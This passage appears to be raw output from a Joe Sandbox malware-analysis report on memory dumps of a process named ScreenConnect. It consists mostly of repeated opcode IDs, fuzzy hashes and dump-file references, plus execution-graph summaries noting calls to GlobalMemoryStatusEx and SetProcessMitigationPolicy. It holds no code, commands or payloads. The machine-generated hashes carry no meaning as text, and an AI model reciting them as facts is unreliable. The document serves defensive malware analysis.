                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1bfecbff3c9bfdb14fd7b380423800d4168fec4e75a74b2dbf8aaf8ec39c473e
                                                                                                                                                                      • Instruction ID: 4418504a1d0976f6ee24afe542f6e48354312578f4e5b3df0801cd5b9c226b92
                                                                                                                                                                      • Opcode Fuzzy Hash: 1bfecbff3c9bfdb14fd7b380423800d4168fec4e75a74b2dbf8aaf8ec39c473e
                                                                                                                                                                      • Instruction Fuzzy Hash: 05510A31E0964E4FEBA4EB6A846A7A437E1EF5A300F0141B9D49DD72F2DD28B9448740
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 94b95bdaf832e12c388f0af86a9625dfcd599bd9c60a859c0efec4f6ba6989d3
                                                                                                                                                                      • Instruction ID: e848867163330f6b1e9cb2a3e490a3c00786399e9d24c27c39a704bd42ef1e3e
                                                                                                                                                                      • Opcode Fuzzy Hash: 94b95bdaf832e12c388f0af86a9625dfcd599bd9c60a859c0efec4f6ba6989d3
                                                                                                                                                                      • Instruction Fuzzy Hash: D941A671709A4D8FDB94CF19C8A4A653BA1FF59314B1501ADE46DCB2E2CB35E852CB01
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7a8f98bf1a0b7ba76fb1de58de1e7214d639edc272915650ccbe65ccd2bc45a8
                                                                                                                                                                      • Instruction ID: a01b7f2edd47cb5fc089933f66f9870dd5bd8c8fa4d90237d9d00abd6d0b6965
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a8f98bf1a0b7ba76fb1de58de1e7214d639edc272915650ccbe65ccd2bc45a8
                                                                                                                                                                      • Instruction Fuzzy Hash: CB312731B19A0E4FE794FB6D98A457873D1FB95360B54017BC41DC72AADD24FD828381
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0e530f8b5909f0d100afa5a5f51a34de00f1e8e3a78e01decd3f7b8cd1355b5e
                                                                                                                                                                      • Instruction ID: 91256b067b063bbe42935abf6e4d3ca752f3603b47a0d3de56e1fb26c11c7422
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e530f8b5909f0d100afa5a5f51a34de00f1e8e3a78e01decd3f7b8cd1355b5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 34411761B0E68A4FEB579B6948B01B47F92EF47344F0901BAD0ECCB1EBDD196806C341
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8695b4277dd133d1237b2967774ec6b027d795c96b94f291fe386e46538d6354
                                                                                                                                                                      • Instruction ID: 169026b19c63bdc03ec644d85fc99da88fcf19161289696e3927f3703a9b4682
                                                                                                                                                                      • Opcode Fuzzy Hash: 8695b4277dd133d1237b2967774ec6b027d795c96b94f291fe386e46538d6354
                                                                                                                                                                      • Instruction Fuzzy Hash: B541D57390F7964FD722AABE98614D53FA0EF1331870901F7D0D98F0A3E91A79468781
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b12034b5cabfed8aa0e72d7eb1d5c287d3c3f5df9de815c3b1ed401a16090973
                                                                                                                                                                      • Instruction ID: b73d558db9eeaa9b76eb078683fea5b8829f95c6a8d15a90d1f3b4af5170c15c
                                                                                                                                                                      • Opcode Fuzzy Hash: b12034b5cabfed8aa0e72d7eb1d5c287d3c3f5df9de815c3b1ed401a16090973
                                                                                                                                                                      • Instruction Fuzzy Hash: A6218D63A4F7C91FD3A686AA18355B03FB0EF5721170A01FBE498CB1A3D95DAD0A8351
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bb50b4b296c6ce572a0810c9b26989bbae82078488757ee1908c307c21824a23
                                                                                                                                                                      • Instruction ID: 08f9d01ce96303f0d265930fc5934d4d617c258704a0410478cf1ccf9cc9d67d
                                                                                                                                                                      • Opcode Fuzzy Hash: bb50b4b296c6ce572a0810c9b26989bbae82078488757ee1908c307c21824a23
                                                                                                                                                                      • Instruction Fuzzy Hash: 11319370B09A4E8FDB94EF18C460AA977A2FF99314B5101B9D06DCB2D6CB35EC52CB40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b4dece0e4a68d25b97e8add01a1e0f52a07a0546b3577b16f56616e832db6d96
                                                                                                                                                                      • Instruction ID: 367baaca5856b8282ddc200ffa3d306785ee4108dfbe051ff3538aca9ea703e8
                                                                                                                                                                      • Opcode Fuzzy Hash: b4dece0e4a68d25b97e8add01a1e0f52a07a0546b3577b16f56616e832db6d96
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D31D170A0961C8FEB58EF98C85ABEDBBF0FB59310F00426ED04DD7251CA706845CB81
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2f89855a608f774f7172c9415feef0e4e4795830cb2d467515ee61a37d1e4967
                                                                                                                                                                      • Instruction ID: 92b416b33919f16f488dd7f64e3f5aae9ba0d5ff5582e6b1cb1afde49a46a245
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f89855a608f774f7172c9415feef0e4e4795830cb2d467515ee61a37d1e4967
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F319E70A0591C8FEBE4EF59C4A97A477E1EF69300F4140B9D45DDB2A2DE34BD808B40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 708ce7b688ae6f2b7b89bbd56da224a1938549f173d97b6a50394bd89fd8101d
• Instruction ID: 52afa2d878a9f915d2610569fe518370e7a0cff98268f71eabd5a20da16df4fb
• Opcode Fuzzy Hash: 708ce7b688ae6f2b7b89bbd56da224a1938549f173d97b6a50394bd89fd8101d
• Instruction Fuzzy Hash: D2312C70B19A0E8FDB98EF19C4A0AA973E2FF99304B500179D02DC7295CB35ED52CB80
Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d22a63bb5e20613daae5bfa7502e076fb13a4821f834d11682084cce05a3c913
                                                                                                                                                                      • Instruction ID: 5bc92de85b14cf6376012ec7c57792d5076f87271d9efb66153213032a9507d2
                                                                                                                                                                      • Opcode Fuzzy Hash: d22a63bb5e20613daae5bfa7502e076fb13a4821f834d11682084cce05a3c913
                                                                                                                                                                      • Instruction Fuzzy Hash: 8AE09BB114E50C6EA61CAA55AC079F7779CE747134F00111FE18E85012F156B5238295
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bf2efe4d7021bb80bf4d8af437a27b8c821f0f30994a593aa0671aa1ddd4b5b5
                                                                                                                                                                      • Instruction ID: cfbe134eb0716f7cb2768f202c36d554281f120d867da6b82a96872d964a7233
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2efe4d7021bb80bf4d8af437a27b8c821f0f30994a593aa0671aa1ddd4b5b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 24F02872A0D68C1FEB10DFA9886A4FD7FF0EF82200F0500E7D45CCB062EA247A598741
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f47db5e907bd1568b51ce40cd48f0ff60f6a04b927cb69741ec554da32a09882
                                                                                                                                                                      • Instruction ID: 7599b9eb853dc4d6e4aad7dcc3109ca65314c218fba19491ab840e7343d9459c
                                                                                                                                                                      • Opcode Fuzzy Hash: f47db5e907bd1568b51ce40cd48f0ff60f6a04b927cb69741ec554da32a09882
                                                                                                                                                                      • Instruction Fuzzy Hash: 61F04434A04A5C8FDB59EB18C8A87A9B7F0FB54301F0002ADC40EE3351DF346A85CB45
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c10e6e20110581779b863501aee46d9f31cef2d81e1c200d3dca7bcf64136299
                                                                                                                                                                      • Instruction ID: 1937ad049f2b3196b3eb4a3c290403e372fd587987e9fe2b11432b8b88dea367
                                                                                                                                                                      • Opcode Fuzzy Hash: c10e6e20110581779b863501aee46d9f31cef2d81e1c200d3dca7bcf64136299
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0F032A1978D4FC316AB30887A6A97FB1BF45204B8400EFE01CCB1EBEE389904C741
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3edc34cbc1c8fa39d59eff821eacd17a1cd8efaa216543f3d51ded3f8215c2b0
                                                                                                                                                                      • Instruction ID: a6c98595ddf0e8127303e98a712a890133edb071e8045c55c85344d2a506899a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3edc34cbc1c8fa39d59eff821eacd17a1cd8efaa216543f3d51ded3f8215c2b0
                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0303540968C9FCF46DB68D4618D97B70FF16321B0501C6E099CB052D7219A55CB82
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 94238d326c8f275d8c7410ec35d7f1518f9fd1f48b06161a5730d0c80e665684
                                                                                                                                                                      • Instruction ID: d2a052c5b29fce5fa72c0f6d111ace0c5ad18bbb2ffc1e5d5ebf42b56f2f630d
                                                                                                                                                                      • Opcode Fuzzy Hash: 94238d326c8f275d8c7410ec35d7f1518f9fd1f48b06161a5730d0c80e665684
                                                                                                                                                                      • Instruction Fuzzy Hash: 68E09A2110F3D81FDB539B3988A88E43FA0AE1322030902EFE4818F4B3E5199A89C742
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 450544b5d5d97aac28a20be79b34d9073a27735aeb7ffb1963148b7ad88e3071
                                                                                                                                                                      • Instruction ID: 0bcd6411c6520cbe9182be11120ce50303967c9718584ba32306bb4ad0f6e9f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 450544b5d5d97aac28a20be79b34d9073a27735aeb7ffb1963148b7ad88e3071
                                                                                                                                                                      • Instruction Fuzzy Hash: 48E08C26B4E61B43FB7C25A768E23B560D08F06351F4A407A942DC40E9EC9CAE808592
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f518bdd11283ad14f5167fbb65453287231b4122e2dfb4e946d0df1b2f0c417a
                                                                                                                                                                      • Instruction ID: e68a83779060210e64954ee8739035c2e3f648c56deba42e7569bbf37c426893
                                                                                                                                                                      • Opcode Fuzzy Hash: f518bdd11283ad14f5167fbb65453287231b4122e2dfb4e946d0df1b2f0c417a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE06890F1EA8E0BE71DEA22442182A7381FF14200B0100FAC09E970DBDC28BD014380
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b42b423f1aa1dfbd5b371c09d02e0e46b82ac7ad4654ed683eb091f2c8be602a
                                                                                                                                                                      • Instruction ID: 2bebb2675f7d2bbf932e0e7aa45f2a40f324c03d28094ce254696b0244d9a0d8
                                                                                                                                                                      • Opcode Fuzzy Hash: b42b423f1aa1dfbd5b371c09d02e0e46b82ac7ad4654ed683eb091f2c8be602a
                                                                                                                                                                      • Instruction Fuzzy Hash: E8E04F31F1A95E8BDAF8AE5A846477433C2FB99348B594434805ECB294DE25B9014B40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8ea3b9bcf005a40ffd3e9ba3ffac0108fd7a55c4df9a97c37cb5a0c126ce105c
                                                                                                                                                                      • Instruction ID: 3aff2f63cca81742a2999dc21b7ae44f553c7371d1e93898c821c75660df82c0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea3b9bcf005a40ffd3e9ba3ffac0108fd7a55c4df9a97c37cb5a0c126ce105c
                                                                                                                                                                      • Instruction Fuzzy Hash: 40E01A31A1051C8ECB64EB6598556ECB371EF85310F4001F6D22ED21A1CE3469818B00
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
• API String ID:
• Opcode ID: c0fba3318a37b32016f8ab8780becabf0a8838d2fdb6fb7a001a024ee4fb1578
• Instruction ID: c0c13b09fbc042050cee7ac372a36384cbf0e7043e6e8309c2d31e0eb2a057f0
• Opcode Fuzzy Hash: c0fba3318a37b32016f8ab8780becabf0a8838d2fdb6fb7a001a024ee4fb1578
• Instruction Fuzzy Hash: 26E0123114F6C50FD716EB75986CC547F90DE2721434A04EEC185CF1B3E95A9948C741
Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0f82583ea56ef5179abe021cc74fc55130002209f7b4f0b3b1bf58f5b50dd4be
• Instruction ID: 0eb13a167ce1b03736f4ee32cae5fcc7303c3cdc5e11cc3f5c24f65e70ce3975
• Opcode Fuzzy Hash: 0f82583ea56ef5179abe021cc74fc55130002209f7b4f0b3b1bf58f5b50dd4be
• Instruction Fuzzy Hash: 42C09B10F1A54F86F165EBE5447117F1552EF8D600B524435E41DC51A6CD3C77015545

Execution Graph

Execution Coverage: 12.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 10
Total number of Limit Nodes: 1
[Execution graph rendering omitted; recoverable paths: 7ffd9b5f8e54 -> 7ffd9b5f8e5d -> 7ffd9b5f9002 GlobalMemoryStatusEx -> 7ffd9b5f9025 (side branch to 7ffd9b5f8f52); 7ffd9b2e8014 -> 7ffd9b2e801d -> 7ffd9b2e80f6 SetProcessMitigationPolicy -> 7ffd9b2e8152 (side branch to 7ffd9b2e8082)]

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph edge list omitted; function at 7ffd9b5f8e54, entry block 7ffd9b5f8e54-7ffd9b5f8e5b, GlobalMemoryStatusEx called in block 7ffd9b5f9002-7ffd9b5f9023]
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1849123075.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffd9b5f0000_ScreenConnect.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: a5c687e5ace4fa2035f1a763994926c2b0994702f6f03170e5bbf06d6aecf415
• Instruction ID: 1ebd7b7d4b5835fd7c4cd2ec06995f7a63fe048f0343419c382381aed4b7d074
• Opcode Fuzzy Hash: a5c687e5ace4fa2035f1a763994926c2b0994702f6f03170e5bbf06d6aecf415
• Instruction Fuzzy Hash: 1E814D31B0E6CD8FE7B697A448257A8BFE1EF56310F0541BAD05CC79A3DA246906C741

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.1843542681.00007FFD9B2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffd9b2e0000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0
• Opcode ID: e6e79ef99e37e2214a51b4b85793df2b9c68ba05e3210719716596dcc0b03717
• Instruction ID: 6091ad3c7a6be83132b8c532adc28fd34f0e1991aec85656c8fb2f08ea7e4eb4
• Opcode Fuzzy Hash: e6e79ef99e37e2214a51b4b85793df2b9c68ba05e3210719716596dcc0b03717
• Instruction Fuzzy Hash: 14514931D0DB494FDB28AFA8DC5A5E97BE0EF55311F04017FE089C3292DE68B9468B91